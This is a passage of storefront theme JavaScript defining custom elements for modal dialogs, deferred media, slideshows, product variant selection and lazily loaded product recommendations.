    document.body.classList.add('overflow-hidden');
    this.setAttribute('open', '');
    if (popup) popup.loadContent();
    trapFocus(this, this.querySelector('[role="dialog"]'));
    window.pauseAllMedia();
  }

  hide() {
    document.body.classList.remove('overflow-hidden');
    document.body.dispatchEvent(new CustomEvent('modalClosed'));
    this.removeAttribute('open');
    removeTrapFocus(this.openedBy);
    window.pauseAllMedia();
  }
}
customElements.define('modal-dialog', ModalDialog);

class ModalOpener extends HTMLElement {
  constructor() {
    super();

    const button = this.querySelector('button');

    if (!button) return;
    button.addEventListener('click', () => {
      const modal = document.querySelector(this.getAttribute('data-modal'));
      if (modal) modal.show(button);
    });
  }
}
customElements.define('modal-opener', ModalOpener);

class DeferredMedia extends HTMLElement {
  constructor() {
    super();
    const poster = this.querySelector('[id^="Deferred-Poster-"]');
    if (!poster) return;
    poster.addEventListener('click', this.loadContent.bind(this));
  }

  loadContent(focus = true) {
    window.pauseAllMedia();
    if (!this.getAttribute('loaded')) {
      const content = document.createElement('div');
      content.appendChild(this.querySelector('template').content.firstElementChild.cloneNode(true));

      this.setAttribute('loaded', true);
      const deferredElement = this.appendChild(content.querySelector('video, model-viewer, iframe'));
      if (focus) deferredElement.focus();
      if (deferredElement.nodeName == 'VIDEO' && deferredElement.getAttribute('autoplay')) {
        // force autoplay for safari
        deferredElement.play();
      }
    }
  }
}

customElements.define('deferred-media', DeferredMedia);

class SliderComponent extends HTMLElement {
  constructor() {
    super();
    this.slider = this.querySelector('[id^="Slider-"]');
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.enableSliderLooping = false;
    this.currentPageElement = this.querySelector('.slider-counter--current');
    this.pageTotalElement = this.querySelector('.slider-counter--total');
    this.prevButton = this.querySelector('button[name="previous"]');
    this.nextButton = this.querySelector('button[name="next"]');

    if (!this.slider || !this.nextButton) return;
    
    this.initPages();
    const resizeObserver = new ResizeObserver((entries) => this.initPages());
    resizeObserver.observe(this.slider);

    this.slider.addEventListener('scroll', this.update.bind(this));
    this.prevButton.addEventListener('click', this.onButtonClick.bind(this));
    this.nextButton.addEventListener('click', this.onButtonClick.bind(this));
  }

  initPages() {
    this.sliderItemsToShow = Array.from(this.sliderItems).filter((element) => element.clientWidth > 0);
    if (this.sliderItemsToShow.length < 2) return;
    
    this.sliderItemOffset = this.sliderItemsToShow[1].offsetLeft - this.sliderItemsToShow[0].offsetLeft;
    this.slidesPerPage = Math.floor(
      (this.slider.clientWidth - this.sliderItemsToShow[0].offsetLeft) / this.sliderItemOffset
    );
    this.totalPages = this.sliderItemsToShow.length - this.slidesPerPage + 1;
    this.update();
  }
   
  resetPages() {
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.initPages();
  }

  update() {
    if (!this.slider || !this.nextButton) return;

    const previousPage = this.currentPage;
    this.currentPage = Math.round(this.slider.scrollLeft / this.sliderItemOffset) + 1;

    if (this.currentPageElement && this.pageTotalElement) {
      this.currentPageElement.textContent = this.currentPage;
      this.pageTotalElement.textContent = this.totalPages;
    }

    if (this.currentPage != previousPage) {
      this.dispatchEvent(
        new CustomEvent('slideChanged', {
          detail: {
            currentPage: this.currentPage,
            currentElement: this.sliderItemsToShow[this.currentPage - 1],
          },
        })
      );
    }

    if (this.enableSliderLooping) return;

    if (this.isSlideVisible(this.sliderItemsToShow[0]) && this.slider.scrollLeft === 0) {
      this.prevButton.setAttribute('disabled', 'disabled');
    } else {
      this.prevButton.removeAttribute('disabled');
    }

    if (this.isSlideVisible(this.sliderItemsToShow[this.sliderItemsToShow.length - 1])) {
      this.nextButton.setAttribute('disabled', 'disabled');
    } else {
      this.nextButton.removeAttribute('disabled');
    }
  }

  isSlideVisible(element, offset = 0) {
    const lastVisibleSlide = this.slider.clientWidth + this.slider.scrollLeft - offset;
    return element.offsetLeft + element.clientWidth <= lastVisibleSlide && element.offsetLeft >= this.slider.scrollLeft;
  }

  onButtonClick(event) {
    event.preventDefault();
    const step = event.currentTarget.dataset.step || 1;
    this.slideScrollPosition =
      event.currentTarget.name === 'next'
        ? this.slider.scrollLeft + step * this.sliderItemOffset
        : this.slider.scrollLeft - step * this.sliderItemOffset;
    this.slider.scrollTo({
      left: this.slideScrollPosition,
    });
  }
}

customElements.define('slider-component', SliderComponent);

class SlideshowComponent extends SliderComponent {
  constructor() {
    super();

    this.sliderControlWrapper = this.querySelector('.slider-buttons');
    this.enableSliderLooping = true;
       
    if (!this.sliderControlWrapper) return;

    this.sliderFirstItemNode = this.slider.querySelector('.slideshow__slide');
    if (this.sliderItemsToShow.length > 0) this.currentPage = 1;

    this.announcementBarSlider = this.querySelector('.announcement-bar-slider');
    this.announcerBarAnimationDelay = this.announcementBarSlider ? 250 : 0;

    this.sliderControlLinksArray = Array.from(this.sliderControlWrapper.querySelectorAll('.slider-counter__link'));
    this.sliderControlLinksArray.forEach((link) => link.addEventListener('click', this.linkToSlide.bind(this)));
    this.slider.addEventListener('scroll', this.setSlideVisibility.bind(this));
    this.setSlideVisibility();

    if (this.announcementBarSlider) {
      this.announcementBarArrowButtonWasClicked = false;

      this.reducedMotion = window.matchMedia('(prefers-reduced-motion: reduce)');
      this.reducedMotion.addEventListener('change', () => {
        if (this.slider.getAttribute('data-autoplay') === 'true') this.setAutoPlay();
      });

      [this.prevButton, this.nextButton].forEach((button) => {
        button.addEventListener(
          'click',
          () => {
            this.announcementBarArrowButtonWasClicked = true;
          },
          { once: true }
        );
      });
    }

    if (this.slider.getAttribute('data-autoplay') === 'true') this.setAutoPlay();
  }

  setAutoPlay() {
    this.autoplaySpeed = this.slider.dataset.speed * 1000;
    this.addEventListener('mouseover', this.focusInHandling.bind(this));
    this.addEventListener('mouseleave', this.focusOutHandling.bind(this));
    this.addEventListener('focusin', this.focusInHandling.bind(this));
    this.addEventListener('focusout', this.focusOutHandling.bind(this));

    if (this.querySelector('.slideshow__autoplay')) {
      this.sliderAutoplayButton = this.querySelector('.slideshow__autoplay');
      this.sliderAutoplayButton.addEventListener('click', this.autoPlayToggle.bind(this));
      this.autoplayButtonIsSetToPlay = true;
      this.play();
    } else {
      this.reducedMotion.matches || this.announcementBarArrowButtonWasClicked
        ? this.pause()
        : this.play();
    }
  }

  onButtonClick(event) {
    super.onButtonClick(event);
    this.wasClicked = true;

    const isFirstSlide = this.currentPage === 1;
    const isLastSlide = this.currentPage === this.sliderItemsToShow.length;

    if (!isFirstSlide && !isLastSlide) {
      this.applyAnimationToAnnouncementBar(event.currentTarget.name);
      return;
    }

    if (isFirstSlide && event.currentTarget.name === 'previous') {
      this.slideScrollPosition =
        this.slider.scrollLeft + this.sliderFirstItemNode.clientWidth * this.sliderItemsToShow.length;
    } else if (isLastSlide && event.currentTarget.name === 'next') {
      this.slideScrollPosition = 0;
    }

    this.setSlidePosition(this.slideScrollPosition);

    this.applyAnimationToAnnouncementBar(event.currentTarget.name);
  }

  setSlidePosition(position) {
    if (this.setPositionTimeout) clearTimeout(this.setPositionTimeout);
    this.setPositionTimeout = setTimeout (() => {
      this.slider.scrollTo({
        left: position,
      });
    }, this.announcerBarAnimationDelay);
  }

  update() {
    super.update();
    this.sliderControlButtons = this.querySelectorAll('.slider-counter__link');
    this.prevButton.removeAttribute('disabled');

    if (!this.sliderControlButtons.length) return;

    this.sliderControlButtons.forEach((link) => {
      link.classList.remove('slider-counter__link--active');
      link.removeAttribute('aria-current');
    });
    this.sliderControlButtons[this.currentPage - 1].classList.add('slider-counter__link--active');
    this.sliderControlButtons[this.currentPage - 1].setAttribute('aria-current', true);
  }

  autoPlayToggle() {
    this.togglePlayButtonState(this.autoplayButtonIsSetToPlay);
    this.autoplayButtonIsSetToPlay ? this.pause() : this.play();
    this.autoplayButtonIsSetToPlay = !this.autoplayButtonIsSetToPlay;
  }

  focusOutHandling(event) {
    if (this.sliderAutoplayButton) {
      const focusedOnAutoplayButton =
        event.target === this.sliderAutoplayButton || this.sliderAutoplayButton.contains(event.target);
      if (!this.autoplayButtonIsSetToPlay || focusedOnAutoplayButton) return;
      this.play();
    } else if (
      !this.reducedMotion.matches &&
      !this.announcementBarArrowButtonWasClicked
    ) {
      this.play();
    }
  }

  focusInHandling(event) {
    if (this.sliderAutoplayButton) {
      const focusedOnAutoplayButton =
        event.target === this.sliderAutoplayButton || this.sliderAutoplayButton.contains(event.target);
      if (focusedOnAutoplayButton && this.autoplayButtonIsSetToPlay) {
        this.play();
      } else if (this.autoplayButtonIsSetToPlay) {
        this.pause();
      }
    } else if (this.announcementBarSlider.contains(event.target)) {
      this.pause();
    }
  }

  play() {
    this.slider.setAttribute('aria-live', 'off');
    clearInterval(this.autoplay);
    this.autoplay = setInterval(this.autoRotateSlides.bind(this), this.autoplaySpeed);
  }

  pause() {
    this.slider.setAttribute('aria-live', 'polite');
    clearInterval(this.autoplay);
  }

  togglePlayButtonState(pauseAutoplay) {
    if (pauseAutoplay) {
      this.sliderAutoplayButton.classList.add('slideshow__autoplay--paused');
      this.sliderAutoplayButton.setAttribute('aria-label', window.accessibilityStrings.playSlideshow);
    } else {
      this.sliderAutoplayButton.classList.remove('slideshow__autoplay--paused');
      this.sliderAutoplayButton.setAttribute('aria-label', window.accessibilityStrings.pauseSlideshow);
    }
  }

  autoRotateSlides() {
    const slideScrollPosition =
      this.currentPage === this.sliderItems.length
        ? 0
        : this.slider.scrollLeft + this.sliderItemOffset;

    this.setSlidePosition(slideScrollPosition);
    this.applyAnimationToAnnouncementBar();
  }

  setSlideVisibility(event) {
    this.sliderItemsToShow.forEach((item, index) => {
      const linkElements = item.querySelectorAll('a');
      if (index === this.currentPage - 1) {
        if (linkElements.length)
          linkElements.forEach((button) => {
            button.removeAttribute('tabindex');
          });
        item.setAttribute('aria-hidden', 'false');
        item.removeAttribute('tabindex');
      } else {
        if (linkElements.length)
          linkElements.forEach((button) => {
            button.setAttribute('tabindex', '-1');
          });
        item.setAttribute('aria-hidden', 'true');
        item.setAttribute('tabindex', '-1');
      }
    });
    this.wasClicked = false;
  }

  applyAnimationToAnnouncementBar(button = 'next') {
    if (!this.announcementBarSlider) return;

    const itemsCount = this.sliderItems.length;
    const increment = button === 'next' ? 1 : -1;
    const currentIndex = this.currentPage - 1;
    
    let nextIndex = (currentIndex + increment) % itemsCount;
    nextIndex = nextIndex === -1 ? itemsCount - 1 : nextIndex;

    const nextSlide = this.sliderItems[nextIndex];
    const currentSlide = this.sliderItems[currentIndex];

    const animationClassIn = 'announcement-bar-slider--fade-in';
    const animationClassOut = 'announcement-bar-slider--fade-out';

    const isFirstSlide = currentIndex === 0;
    const isLastSlide = currentIndex === itemsCount - 1;

    const shouldMoveNext = (button === 'next' && !isLastSlide) || (button === 'previous' && isFirstSlide);
    const direction = shouldMoveNext ? 'next' : 'previous';

    currentSlide.classList.add(`${animationClassOut}-${direction}`);
    nextSlide.classList.add(`${animationClassIn}-${direction}`);

    setTimeout(() => {
      currentSlide.classList.remove(`${animationClassOut}-${direction}`);
      nextSlide.classList.remove(`${animationClassIn}-${direction}`);
    }, this.announcerBarAnimationDelay * 2);
  }

  linkToSlide(event) {
    event.preventDefault();
    const slideScrollPosition =
      this.slider.scrollLeft +
      this.sliderFirstItemNode.clientWidth *
      (this.sliderControlLinksArray.indexOf(event.currentTarget) + 1 - this.currentPage);
    this.slider.scrollTo({
      left: slideScrollPosition,
    });
  }
}

customElements.define('slideshow-component', SlideshowComponent);

class VariantSelects extends HTMLElement {
  constructor() {
    super();
    this.addEventListener('change', this.onVariantChange);
  }

  onVariantChange() {
    this.updateOptions();
    this.updateMasterId();
    this.toggleAddButton(true, '', false);
    this.updatePickupAvailability();
    this.removeErrorMessage();
    this.updateVariantStatuses();

    if (!this.currentVariant) {
      this.toggleAddButton(true, '', true);
      this.setUnavailable();
    } else {
      this.updateMedia();
      this.updateURL();
      this.updateVariantInput();
      this.renderProductInfo();
      this.updateShareUrl();
    }
  }

  updateOptions() {
    this.options = Array.from(this.querySelectorAll('select'), (select) => select.value);
  }

  updateMasterId() {
    this.currentVariant = this.getVariantData().find((variant) => {
      return !variant.options.map((option, index) => {
        return this.options[index] === option;
      }).includes(false);
    });
  }

  updateMedia() {
    if (!this.currentVariant) return;
    if (!this.currentVariant.featured_media) return;

    const color = this.currentVariant[`option${parseInt(this.dataset.colorOptionIndex) + 1 }`]

    const mediaGalleries = document.querySelectorAll(`[id^="MediaGallery-${this.dataset.section}"]`);
    mediaGalleries.forEach(mediaGallery => {
      mediaGallery.setActiveMedia(`${this.dataset.section}-${this.currentVariant.featured_media.id}`, true);
      if (color) {
        const handle = color.replace(/\s+/g, '-').toLowerCase();
        mediaGallery.dispatchEvent(new CustomEvent('colorChanged', {
          detail: {
            color: handle,
          },
        }));
      }
    });

    const modalContent = document.querySelector(`#ProductModal-${this.dataset.section} .product-media-modal__content`);
    if (!modalContent) return;
    const newMediaModal = modalContent.querySelector(`[data-media-id="${this.currentVariant.featured_media.id}"]`);
    modalContent.prepend(newMediaModal);
  }

  updateURL() {
    if (!this.currentVariant || this.dataset.updateUrl === 'false') return;
    window.history.replaceState({}, '', `${this.dataset.url}?variant=${this.currentVariant.id}`);
  }

  updateShareUrl() {
    const shareButton = document.getElementById(`Share-${this.dataset.section}`);
    if (!shareButton || !shareButton.updateUrl) return;
    shareButton.updateUrl(`${window.shopUrl}${this.dataset.url}?variant=${this.currentVariant.id}`);
  }

  updateVariantInput() {
    const productForms = document.querySelectorAll(`#product-form-${this.dataset.section}, #product-form-installment-${this.dataset.section}`);
    productForms.forEach((productForm) => {
      const input = productForm.querySelector('input[name="id"]');
      input.value = this.currentVariant.id;
      input.dispatchEvent(new Event('change', { bubbles: true }));
    });
  }

  updateVariantStatuses() {
    const selectedOptionOneVariants = this.variantData
      .filter(variant => {
        return this.querySelector(':checked').value === variant.option1
      });
    const inputWrappers = [...this.querySelectorAll('.product-form__input')];
    inputWrappers.forEach((option, index) => {
      if (index === 0) return;
      const optionInputs = [...option.querySelectorAll('input[type="radio"], option')]
      const previousOptionSelected = inputWrappers[index - 1].querySelector(':checked').value;
      const availableOptionInputsValue = selectedOptionOneVariants
        .filter(variant => variant.available && variant[`option${index}`] === previousOptionSelected)
        .map(variantOption => variantOption[`option${index + 1}`]);
      this.setInputAvailability(optionInputs, availableOptionInputsValue)
    });
  }

  setInputAvailability(listOfOptions, listOfAvailableOptions) {

    listOfOptions.forEach(input => {
      if (listOfAvailableOptions.includes(input.getAttribute('value'))) {
        input.innerText = input.getAttribute('value');
      } else {
        input.innerText = window.variantStrings.unavailable_with_option.replace('[value]', input.getAttribute('value'));
      }
    });
  }

  updatePickupAvailability() {
    const pickUpAvailability = document.querySelector('pickup-availability');
    if (!pickUpAvailability) return;

    if (this.currentVariant && this.currentVariant.available) {
      pickUpAvailability.fetchAvailability(this.currentVariant.id);
    } else {
      pickUpAvailability.removeAttribute('available');
      pickUpAvailability.innerHTML = '';
    }
  }

  removeErrorMessage() {
    const section = this.closest('section');
    if (!section) return;

    const productForm = section.querySelector('product-form');
    if (productForm) productForm.handleErrorMessage();
  }

  renderProductInfo() {
    const requestedVariantId = this.currentVariant.id;
    const sectionId = this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section;

    fetch(`${this.dataset.url}?variant=${requestedVariantId}&section_id=${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`)
      .then((response) => response.text())
      .then((responseText) => {
        // prevent unnecessary ui changes from abandoned selections

        if (this.currentVariant.id !== requestedVariantId) return;

        const html = new DOMParser().parseFromString(responseText, 'text/html')
        const destination = document.getElementById(`price-${this.dataset.section}`);
        const source = html.getElementById(`price-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`);
        const skuSource = html.getElementById(`Sku-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`);
        const skuDestination = document.getElementById(`Sku-${this.dataset.section}`);
        const inventorySource = html.getElementById(`Inventory-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`);
        const inventoryDestination = document.getElementById(`Inventory-${this.dataset.section}`);

        if (source && destination) destination.innerHTML = source.innerHTML;
        if (inventorySource && inventoryDestination) inventoryDestination.innerHTML = inventorySource.innerHTML;
        if (skuSource && skuDestination) {
          skuDestination.innerHTML = skuSource.innerHTML;
          skuDestination.classList.toggle('visibility-hidden', skuSource.classList.contains('visibility-hidden'));
        }

        const price = document.getElementById(`price-${this.dataset.section}`);

        if (price) price.classList.remove('visibility-hidden');

        if (inventoryDestination) inventoryDestination.classList.toggle('visibility-hidden', inventorySource.innerText === '');

        const addButtonUpdated = html.getElementById(`ProductSubmitButton-${sectionId}`);
        this.toggleAddButton(addButtonUpdated ? addButtonUpdated.hasAttribute('disabled') : true, window.variantStrings.soldOut);

        publish(PUB_SUB_EVENTS.variantChange, {
          data: {
            sectionId,
            html,
            variant: this.currentVariant
          }
        });
      });
  }

  toggleAddButton(disable = true, text, modifyClass = true) {
    const productForm = document.getElementById(`product-form-${this.dataset.section}`);
    if (!productForm) return;
    const addButton = productForm.querySelector('[name="add"]');
    const addButtonText = productForm.querySelector('[name="add"] > span');
    if (!addButton) return;

    if (disable) {
      addButton.setAttribute('disabled', 'disabled');
      if (text) addButtonText.textContent = text;
    } else {
      addButton.removeAttribute('disabled');
      addButtonText.textContent = window.variantStrings.addToCart;
    }

    if (!modifyClass) return;
  }

  setUnavailable() {
    const button = document.getElementById(`product-form-${this.dataset.section}`);
    const addButton = button.querySelector('[name="add"]');
    const addButtonText = button.querySelector('[name="add"] > span');
    const price = document.getElementById(`price-${this.dataset.section}`);
    const inventory = document.getElementById(`Inventory-${this.dataset.section}`);
    const sku = document.getElementById(`Sku-${this.dataset.section}`);

    if (!addButton) return;
    addButtonText.textContent = window.variantStrings.unavailable;
    if (price) price.classList.add('visibility-hidden');
    if (inventory) inventory.classList.add('visibility-hidden');
    if (sku) sku.classList.add('visibility-hidden');
  }

  getVariantData() {
    this.variantData = this.variantData || JSON.parse(this.querySelector('[type="application/json"]').textContent);
    return this.variantData;
  }
}

customElements.define('variant-selects', VariantSelects);

class VariantRadios extends VariantSelects {
  constructor() {
    super();
  }

  setInputAvailability(listOfOptions, listOfAvailableOptions) {
    listOfOptions.forEach(input => {
      if (listOfAvailableOptions.includes(input.getAttribute('value'))) {
        input.classList.remove('disabled');
      } else {
        input.classList.add('disabled');
      }
    });
  }

  updateOptions() {
    const fieldsets = Array.from(this.querySelectorAll('fieldset'));
    this.options = fieldsets.map((fieldset) => {
      return Array.from(fieldset.querySelectorAll('input')).find((radio) => radio.checked).value;
    });
  }
}

customElements.define('variant-radios', VariantRadios);

class ProductRecommendations extends HTMLElement {
  constructor() {
    super();
  }

  connectedCallback() {
    const handleIntersection = (entries, observer) => {
      if (!entries[0].isIntersecting) return;
      observer.unobserve(this);

      fetch(this.dataset.url)
        .then(response => response.text())
        .then(text => {
          const html = document.createElement('div');
          html.innerHTML = text;
          const recommendations = html.querySelector('product-recommendations');

          if (recommendations && recommendations.innerHTML.trim().length) {
            this.innerHTML = recommendations.innerHTML;
          }

          if (!this.querySelector('slideshow-component') && this.classList.contains('complementary-products')) {
            this.remove();
          }

          if (html.querySelector('.grid__item')) {
            this.classList.add('product-recommendations--loaded');
          }
        })
        .catch(e => {
          console.error(e);
        });
    }

    new IntersectionObserver(handleIntersection.bind(this), { rootMargin: '0px 0px 400px 0px' }).observe(this);
  }
}


customElements.define('product-recommendations', ProductRecommendations);
